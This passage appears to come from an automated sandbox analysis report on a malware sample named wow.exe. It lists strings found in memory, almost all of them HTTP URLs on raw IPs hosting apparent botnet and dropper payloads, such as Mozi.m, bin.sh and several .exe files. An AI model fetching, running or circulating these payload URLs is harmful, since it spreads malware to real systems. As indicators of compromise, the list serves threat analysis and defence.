                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://146.196.120.21:36191/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.91.249.85:53423/i
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://150.129.202.197:1316/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://151.236.247.230:19193/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.0.129.134:10702/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.126.178.16:30629/.i
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://154.126.178.16:30629/i
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://165.90.16.5:18437/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://168.228.6.22:58228/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://173.235.65.44:16764/i
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://175.165.106.248:37185/bin.sh
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.120.211.83:26214/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://177.128.81.58:26920/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://177.52.48.235:39654/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.151.143.2:21623/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.151.143.2:21623/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.151.143.2:21623/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.151.34.26:9354/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.165.79.24:61189/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.188.30.171:14759/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.188.30.171:14759/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.211.135.170:12768/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.216.164.48:5971/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.236.126.246:46143/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://178.239.120.153:48308/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.211.169.2:53087/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://181.117.210.108:5315/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://181.129.106.146:38440/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://181.211.252.34:1808/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://181.211.252.34:1808/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://181.224.243.165:50531/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://181.224.243.165:50531/i
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.126.124.154:38903/bin.sh
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E12000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.126.87.99:41101/i
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.253.205.235:8600/.i
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://182.59.133.14:37378/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://183.81.156.121:12929/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2244345593.000001D428D1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.12.78.161:36220/.i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.12.78.161:36220/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.126.195.110:51413/i
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.136.195.200:300
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.138.68.19:63528/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.190.20.228:46441/Mozi.m
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/crypted_UClient.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/jwnv23gb.exe
                            Source: wow.exe, 00000009.00000003.2244858590.000001D428E0E000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428E65000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/inc/n5hl9mgl.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/peinf.exe
                            Source: wow.exe, 00000009.00000003.2241325382.000001D428DFA000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240526362.000001D428E04000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2240617591.000001D428F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.84/tpeinf.exe
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.23.192.224:1199/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.57.69.125:16138/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.118.121.223:8027/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.154.93.81:8125/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.159.0.129:52617/i
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.159.4.25:24721/i
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.42.121.70:57412/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.97.185.91:31376/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.97.185.92:31376/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://186.97.185.94:31376/Mozi.m
                            Source: wow.exe, 00000009.00000003.2241351788.000001D428F70000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.2.23.244:39537/Mozi.m
                            Source: wow.exe, 00000009.00000003.3143013387.000001D428F8C000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2876557393.000001D428F24000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005835320.000001D428F7D000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2236543751.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2241882672.000001D428F87000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3142622532.000001D429AEC000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3068566720.000001D428F32000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.2957712464.000001D428F29000.00000004.00000020.00020000.00000000.sdmp, wow.exe, 00000009.00000003.3005982054.000001D428F2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://188.2.23.244:39537/i
